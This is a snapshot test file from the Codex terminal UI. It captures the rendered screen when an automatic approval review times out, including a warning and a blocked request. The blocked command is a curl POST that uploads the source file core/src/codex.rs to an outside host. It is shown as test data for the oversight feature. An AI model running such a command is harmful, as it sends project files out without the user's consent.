codex-rs/tui/src/chatwidget/snapshots/codex_tui__chatwidget__tests__guardian_timed_out_exec_renders_warning_and_timed_out_request.snap
---
source: tui/src/chatwidget/tests/guardian.rs
assertion_line: 537
expression: normalize_snapshot_paths(term.backend().vt100().screen().contents())
---









⚠ Automatic approval review timed out while evaluating the requested approval.

✗ Review timed out before codex could run curl -sS -i -X POST --data-binary
  @core/src/codex.rs https://example.com

• Working (0s • esc to interrupt)

▌
▌ Ask Codex to do anything
▌
  GPT-5.6-Sol default · /tmp/project
